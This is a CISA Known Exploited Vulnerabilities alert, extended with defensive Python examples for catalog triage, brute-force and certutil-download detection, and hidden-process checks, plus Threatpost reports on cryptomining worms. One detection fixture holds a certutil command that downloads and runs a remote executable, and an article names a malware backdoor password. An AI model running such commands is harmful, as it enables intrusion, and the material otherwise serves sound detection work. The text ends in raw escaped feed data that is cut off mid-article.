CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.
**CVE Number** | **CVE Title** | **Remediation Due Date**
---|---|---
CVE-2021-36934 | Microsoft Windows SAM Local Privilege Escalation Vulnerability | 2/24/2022
CVE-2020-0796 | Microsoft SMBv3 Remote Code Execution Vulnerability | 8/10/2022
CVE-2018-1000861 | Jenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability | 8/10/2022
CVE-2017-9791 | Apache Struts 1 Improper Input Validation Vulnerability | 8/10/2022
CVE-2017-8464 | Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability | 8/10/2022
CVE-2017-10271 | Oracle Corporation WebLogic Server Remote Code Execution Vulnerability | 8/10/2022
CVE-2017-0263 | Microsoft Win32k Privilege Escalation Vulnerability | 8/10/2022
CVE-2017-0262 | Microsoft Office Remote Code Execution Vulnerability | 8/10/2022
CVE-2017-0145 | Microsoft SMBv1 Remote Code Execution Vulnerability | 8/10/2022
CVE-2017-0144 | Microsoft SMBv1 Remote Code Execution Vulnerability | 8/10/2022
CVE-2016-3088 | Apache ActiveMQ Improper Input Validation Vulnerability | 8/10/2022
CVE-2015-2051 | D-Link DIR-645 Router Remote Code Execution | 8/10/2022
CVE-2015-1635 | Microsoft HTTP.sys Remote Code Execution Vulnerability | 8/10/2022
CVE-2015-1130 | Apple OS X Authentication Bypass Vulnerability | 8/10/2022
CVE-2014-4404 | Apple OS X Heap-Based Buffer Overflow Vulnerability | 8/10/2022
[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).
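A way to operationalize the catalog rather than read it by hand, as an added example that is not CISA tooling: it indexes the catalog's JSON feed (using the field names the feed publishes) and ranks scanner findings by how far past their BOD 22-01 due date they are. The three-entry catalog excerpt, the scanner findings and the hostnames are constructed for the demonstration; `fetch_catalog` is the only part that touches the network and is not needed to run the demo.

```python
"""Triage scanner findings against the CISA KEV catalog.

Added example, not CISA tooling.  Field names follow the catalog's JSON
feed; the catalog excerpt and the scanner findings below are constructed."""
import json
import urllib.request
from datetime import date

# Public feed URL of the catalog; used only by fetch_catalog().
KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed excerpt in the feed's shape: three of the entries added in
# this alert, with shortDescription abbreviated.  The real feed carries
# every catalog entry.
KEV_SAMPLE = json.loads("""
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "catalogVersion": "2022.02.10",
  "dateReleased": "2022-02-10T00:00:00.0000Z",
  "count": 3,
  "vulnerabilities": [
    {"cveID": "CVE-2021-36934", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Microsoft Windows SAM Local Privilege Escalation Vulnerability",
     "dateAdded": "2022-02-10", "shortDescription": "Overly permissive ACLs on the SAM database.",
     "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-02-24", "notes": ""},
    {"cveID": "CVE-2020-0796", "vendorProject": "Microsoft", "product": "SMBv3",
     "vulnerabilityName": "Microsoft SMBv3 Remote Code Execution Vulnerability",
     "dateAdded": "2022-02-10", "shortDescription": "SMBv3 compression remote code execution.",
     "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-08-10", "notes": ""},
    {"cveID": "CVE-2017-0144", "vendorProject": "Microsoft", "product": "SMBv1",
     "vulnerabilityName": "Microsoft SMBv1 Remote Code Execution Vulnerability",
     "dateAdded": "2022-02-10", "shortDescription": "SMBv1 remote code execution (EternalBlue).",
     "requiredAction": "Apply updates per vendor instructions.", "dueDate": "2022-08-10", "notes": ""}
  ]
}
""")

# Constructed scanner export: (host, CVE) pairs.  CVE-2022-0001 is not in
# the excerpt, so it is reported as unmatched rather than dropped silently.
FINDINGS = [
    {"host": "ws01", "cve": "CVE-2021-36934"},
    {"host": "db02", "cve": "cve-2020-0796"},   # lower case on purpose: IDs are normalised
    {"host": "fs01", "cve": "CVE-2017-0144"},
    {"host": "web03", "cve": "CVE-2022-0001"},
]

# Reference date for the demonstration (shortly after the first due date).
DEMO_TODAY = date(2022, 3, 1)


def load_catalog(feed):
    """Index the feed by upper-cased CVE ID, with ISO date strings parsed."""
    catalog = {}
    for entry in feed["vulnerabilities"]:
        item = dict(entry)
        item["dateAdded"] = date.fromisoformat(entry["dateAdded"])
        item["dueDate"] = date.fromisoformat(entry["dueDate"])
        catalog[entry["cveID"].upper()] = item
    return catalog


def fetch_catalog(url=KEV_FEED_URL, timeout=30):
    """Download and index the live feed (network access; not used by the demo)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return load_catalog(json.load(resp))


def triage(findings, catalog, today):
    """Split findings into catalog hits (most overdue first) and the rest.

    days_overdue is negative while the BOD 22-01 due date is still ahead."""
    hits, unmatched = [], []
    for finding in findings:
        entry = catalog.get(finding["cve"].upper())
        if entry is None:
            unmatched.append(finding)
            continue
        hits.append({
            "host": finding["host"],
            "cve": entry["cveID"],
            "name": entry["vulnerabilityName"],
            "due": entry["dueDate"].isoformat(),
            "days_overdue": (today - entry["dueDate"]).days,
            "action": entry["requiredAction"],
        })
    hits.sort(key=lambda h: (-h["days_overdue"], h["host"]))
    return hits, unmatched


def overdue(hits):
    """Hits whose due date has already passed."""
    return [h for h in hits if h["days_overdue"] > 0]


def run_demo():
    """Triage the constructed findings against the constructed excerpt."""
    return triage(FINDINGS, load_catalog(KEV_SAMPLE), DEMO_TODAY)


if __name__ == "__main__":
    hits, rest = run_demo()
    for h in hits:
        flag = "OVERDUE" if h["days_overdue"] > 0 else "due"
        print(f'{h["host"]:6} {h["cve"]:15} {flag:7} {h["due"]} ({h["days_overdue"]:+d} d)  {h["name"]}')
    print(f"{len(rest)} finding(s) not in the catalog excerpt")
```

Swap `load_catalog(KEV_SAMPLE)` for `fetch_catalog()` and feed it a real scanner export to get the same ranking against the full catalog; the sort puts the longest-overdue items first and breaks ties by host so the output is stable from run to run.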
Related Threatpost coverage of catalog entries above:

**Self-Propagating Lucifer Malware Targets Windows Systems**
_Threatpost, 24 June 2020 – <https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/>_

Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.

The never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an “exhaustive” list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” said researchers with Palo Alto Networks’ Unit 42 team [in a blog post on Wednesday](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). “Applying the updates and patches to the affected software are strongly advised.”

The vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), the Laravel framework ([CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>) and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).

After successfully exploiting these flaws, the attacker connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet had received 0.493527 XMR (approximately $32).

The malware is also capable of self-propagation through various methods.

It scans for open instances of TCP port 1433 (Microsoft SQL Server) or Remote Procedure Call (RPC) port 135. If either of these is open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (the full list of passwords used is given in Unit 42’s analysis). Upon successful authentication it copies and runs the malware binary on the remote host.

In addition to brute-forcing credentials, the malware uses exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file-sharing protocol) is exposed, Lucifer runs the leaked NSA tooling: the [EternalBlue](<https://threatpost.com/tag/eternalblue/>) and [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>) exploits and the [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) backdoor.

Once these have been used, the certutil utility is used to pull the malware onto the new host. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates; its ability to fetch a URL to disk is what makes it a convenient download tool for malware that already has a foothold.

Lucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.

These added capabilities show that the malware is growing in sophistication, researchers warn. They say enterprises can protect themselves with simple security measures such as applying patches and strengthening passwords.

“While the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it’s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,” stressed researchers.

_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._
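Two of the propagation behaviours described above leave distinctive traces: a burst of failed logons against TCP 1433 or RPC 135 from a single source, and certutil invoked with its download (`-urlcache`) or payload-decoding (`-decode`) switch. The following is an added example of detection logic over such events, not Unit 42's code. The event records, their field names, the hostnames and the addresses are constructed for the demonstration, in the normalised form a SIEM would give MSSQL 18456 / Windows 4625 logon failures and 4688 process-creation events.

```python
"""Detection rules for Lucifer-style propagation: password brute-forcing
against TCP 1433 / RPC 135 and downloads via certutil.

Added example, not Unit 42 code.  EVENTS is a constructed, normalised
feed; the field names are this example's own."""
from collections import defaultdict
from datetime import datetime, timedelta

BRUTE_PORTS = {1433, 135}                  # the two services Lucifer brute-forces
BRUTE_THRESHOLD = 5                        # failures from one source within the window
BRUTE_WINDOW = timedelta(seconds=60)
CERTUTIL_FLAGS = {"-urlcache", "-decode"}  # download / decode-payload switches


def _ts(text):
    return datetime.fromisoformat(text)


# Constructed events (TEST-NET addresses).  'logon_failure' stands for an
# MSSQL 18456 or Windows 4625 record once normalised to host/src/port/user;
# 'process' stands for a 4688 record with its command line.
EVENTS = [
    {"ts": _ts(f"2020-06-10T08:00:{sec:02d}"), "type": "logon_failure",
     "host": "sql01", "src": "192.0.2.7", "port": 1433, "user": user}
    for sec, user in zip(range(0, 30, 5),
                         ["sa", "sa", "administrator", "administrator", "sa", "administrator"])
] + [
    {"ts": _ts("2020-06-10T08:01:00"), "type": "logon_failure",
     "host": "app02", "src": "192.0.2.9", "port": 135, "user": "administrator"},
    {"ts": _ts("2020-06-10T08:01:20"), "type": "logon_failure",
     "host": "app02", "src": "192.0.2.9", "port": 135, "user": "administrator"},
    {"ts": _ts("2020-06-10T08:02:00"), "type": "process", "host": "sql01",
     "cmd": r"C:\Windows\System32\certutil.exe -urlcache -split -f http://198.51.100.5/x.exe C:\Users\Public\x.exe"},
    {"ts": _ts("2020-06-10T08:02:05"), "type": "process", "host": "sql01",
     "cmd": r'"C:\Users\Public\x.exe"'},
    {"ts": _ts("2020-06-10T09:00:00"), "type": "process", "host": "pki01",
     "cmd": r"certutil.exe -verify C:\certs\server.cer"},   # legitimate certutil use
]


def detect_bruteforce(events):
    """Flag (host, src, port) with >= BRUTE_THRESHOLD failures inside any
    BRUTE_WINDOW; the densest window seen is reported as the count."""
    buckets = defaultdict(list)
    for e in events:
        if e["type"] == "logon_failure" and e["port"] in BRUTE_PORTS:
            buckets[(e["host"], e["src"], e["port"])].append(e)
    alerts = []
    for (host, src, port), evs in buckets.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(evs)):          # sliding window over sorted timestamps
            while evs[end]["ts"] - evs[start]["ts"] > BRUTE_WINDOW:
                start += 1
            best = max(best, end - start + 1)
        if best >= BRUTE_THRESHOLD:
            alerts.append({"rule": "bruteforce", "host": host, "src": src, "port": port,
                           "count": best, "users": sorted({e["user"] for e in evs})})
    return alerts


def detect_certutil_download(events):
    """Flag certutil invoked with its download or decode switches."""
    alerts = []
    for e in events:
        if e["type"] != "process":
            continue
        tokens = e["cmd"].lower().split()
        if not tokens:
            continue
        exe = tokens[0].strip('"').rsplit("\\", 1)[-1]   # basename, quotes removed
        if exe in ("certutil", "certutil.exe") and CERTUTIL_FLAGS & set(tokens):
            alerts.append({"rule": "certutil_download", "host": e["host"],
                           "cmd": e["cmd"], "ts": e["ts"].isoformat()})
    return alerts


def run_rules(events):
    return detect_bruteforce(events) + detect_certutil_download(events)


if __name__ == "__main__":
    for alert in run_rules(EVENTS):
        print(alert)
```

The second host (two failures against 135) stays below the threshold and is not reported, and the `-verify` invocation on the PKI host shows why the rule keys on the download switches rather than on certutil itself: the binary is used legitimately, the `-urlcache`/`-decode` combination on a database server is not.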
**PyRoMine Uses NSA Exploit for Monero Mining and Backdoors**
_Threatpost, 26 April 2018 – <https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/>_

The ShadowBrokers’ release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.

The bad code is a Python-based cryptocurrency mining malware, according to Fortinet’s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of “PyRoMine.”

The malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.

“We don’t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,” FortiGuard security researcher Jasper Manuel said in an email interview.

Worryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password “P@ssw0rdf0rme.” It’s likely that this would be used for re-infection and further attacks, according to Manuel.

“It is fairly likely that future attacks could happen,” he told Threatpost. “Although this malware is not a botnet because it doesn’t phone home to report an infection and doesn’t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.”

**Ripe for Spreading**

Based on the earnings that PyRoMine has made to date (only about $650), it hasn’t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important “feature” that makes it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.

Secondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.

The ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA’s Tailored Access Operations unit. The SMB exploits target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft had already fixed both in [MS17-010](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) in March 2017, a month before the tools were made public.

“The patch for EternalRomance was released a year ago, but many still don’t think proactive about security,” Manuel told Threatpost. “The fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.”

And finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it’s left exposed to the internet – one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).

“In the past, we have seen that these exploits were used by state-sponsored threat actors,” Manuel told us. “Within days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.”

PyRoMine isn’t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) – with great success.

Manuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine’s backdoor strategy could become a hallmark going forward.

“I think this is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,” said Chris Roberts, chief security architect at Acalvio, in an emailed comment. “In this case, it’s not only mining and disabling security services. It’s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven’t patched or don’t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.”

**Rocke Group’s Malware Now Has Worm Capabilities**
_Threatpost, 28 January 2021 – <https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/>_

Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.

The malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed up with “worm” capabilities and rootkit detection-evasion features.

“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,” said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). “As we saw, this sample has the capability to delete some cloud providers’ agents and evade their detection.”

Since [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) – including Apache ActiveMQ, Oracle WebLogic and the open-source data structure store Redis – for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group’s latest update aims to sidestep these detection and mitigation efforts.

## **Pro-Ocean Malware**

Pro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecured instances of Redis.

Once downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can use 100 percent of the CPU to mine Monero.

The malware is made up of four components: A rootkit module that installs a rootkit and various other malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search for any processes using the CPU heavily); and an infection module that contains “worm” capabilities.

## **New Features**

The latter “worm” feature is a new addition for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim’s machine. It does so by querying the online service “ident.me,” which returns the caller’s public IP address. The script then tries to infect all the machines in the same /16 subnet (e.g. 10.0.X.X).

“It does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,” said Sasson.

[Figure: Pro-Ocean’s modular structure. Credit: Palo Alto Networks]

Other threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT’s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting cred
entials in August.

The Pro-Ocean malware has also added new rootkit capabilities that cloak its malicious activity.

These updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean – however, in the new version, the developer of the code has added several new code snippets to the library for further functionality.

For example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.

“If it determines that the file needs to be hidden, the malicious function will return a ‘No such file or directory’ error, as if the file in question does not exist,” said Sasson.

Researchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).

“Cryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.”
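The libprocesshider technique described above works entirely in user space: the preloaded library filters what readdir() returns for /proc and, in Pro-Ocean's variant, makes open() fail with ENOENT for the hidden paths. It cannot change the kernel's own answer to kill(pid, 0), which is what this added example (not Unit 42's code and not the library's) uses as a second opinion: every PID that answers the probe but is missing from the /proc listing is either a thread of a listed process (expected; its Tgid differs from the PID) or something hiding. The PID sets in the demonstration are constructed; `scan_live` runs the real comparison on a Linux host and walks PIDs up to `pid_max`, which can take several seconds. A kernel-mode rootkit that filters at the syscall level defeats this check.

```python
"""Cross-check for userland process hiding of the libprocesshider kind.

Added example, not Unit 42 or libprocesshider code.  A preloaded library
can filter readdir() on /proc and make open() return ENOENT, but
kill(pid, 0) is answered by the kernel for every live process."""
import os


def listed_pids():
    """PIDs a preload hook can filter: the readdir() view of /proc."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def probed_pids(max_pid=None):
    """PIDs that exist according to kill(pid, 0); EPERM still means alive."""
    if max_pid is None:
        try:
            with open("/proc/sys/kernel/pid_max") as fh:
                max_pid = int(fh.read())
        except (OSError, ValueError):
            max_pid = 32768
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)          # signal 0: existence check, nothing delivered
        except ProcessLookupError:
            continue
        except PermissionError:
            pass                     # exists, owned by another user
        alive.add(pid)
    return alive


def tgid_of(pid):
    """Thread-group ID from /proc/<pid>/status, or None if it cannot be read
    (a hooked open() returning ENOENT lands here as well)."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        return None
    return None


def classify_hidden(listed, alive, tgid_lookup):
    """PIDs alive but absent from the listing, split into hidden processes
    (Tgid == pid) and entries whose status file could not be read.
    Threads (Tgid != pid) are never listed in /proc and are ignored."""
    hidden, unreadable = [], []
    for pid in sorted(set(alive) - set(listed)):
        tgid = tgid_lookup(pid)
        if tgid is None:
            unreadable.append(pid)
        elif tgid == pid:
            hidden.append(pid)
    return {"hidden": hidden, "unreadable": unreadable}


def preload_indicators():
    """Cheap precursors: a populated /etc/ld.so.preload or LD_PRELOAD set."""
    found = {}
    try:
        with open("/etc/ld.so.preload") as fh:
            libs = [line.strip() for line in fh if line.strip()]
        if libs:
            found["/etc/ld.so.preload"] = libs
    except OSError:
        pass
    if os.environ.get("LD_PRELOAD"):
        found["LD_PRELOAD"] = os.environ["LD_PRELOAD"]
    return found


def scan_live():
    """Run the comparison on this host (Linux only)."""
    listed = listed_pids()
    alive = probed_pids()
    listed |= listed_pids()      # absorb processes that started during the probe
    return classify_hidden(listed, alive, tgid_of), preload_indicators()


if __name__ == "__main__":
    result, preload = scan_live()
    print("preload indicators:", preload or "none")
    print("hidden:", result["hidden"], "unreadable:", result["unreadable"])
```

Anything in `hidden` is a process the readdir() view is lying about; anything in `unreadable` is a PID the kernel confirms but whose status file an open() hook refused, which is exactly the new behaviour the article attributes to Pro-Ocean. A short-lived process that exited between the probe and the second listing can also land in `unreadable`, so treat a single transient entry as a re-scan prompt rather than a verdict.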
Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:43", "description": "Microsoft patched three zero day vulnerabilities actively under attack today as part of its [May Patch Tuesday release](<https://technet.microsoft.com/en-us/security/advisories>).\n\n[Researchers](<https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html>) with FireEye who uncovered the three vulnerabilities said the bugs were actively being exploited by threat actors Turla and APT28.\n\nTwo of the zero day vulnerabilities ([CVE-2017-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0261>) and [CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) were remote code execution (RCE) bugs related to how Microsoft\u2019s Office suite handled Encapsulated PostScript (EPS). FireEye said the third zero day vulnerability was tied to Windows and is an escalation of privilege vulnerability ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)).\n\nAccording to security experts the RCE bugs could be triggered by simply viewing a malicious image in any number of Microsoft Office applications. 
The elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, according to Microsoft.\n\n\u201cAn attacker who successfully exploited this vulnerability (CVE-2017-0263) could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d Microsoft said.\n\nIn total, Microsoft released patches for 55 unique CVEs for Internet Explorer, Edge, Office, Windows and the .NET Framework as part of its May Patch Tuesday release. Fourteen of vulnerabilities were rated critical.\n\n\u201cThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary,\u201d said Ben Read, a cyber espionage analyst with FireEye who co-authored the blog.\n\n\u201cAPT28\u2019s use of two zero days ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>) and [CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)) continues to demonstrate they are a very capable actor. Some of the talk about them doing less technically sophisticated credential theft, shows they can bring the fast ball when they need to against a harder target,\u201d Read said in an interview with Threatpost.\n\nHe added that CVE-2017-0261 is being used by both a nation state (Turla) and an unidentified financially motivated group. 
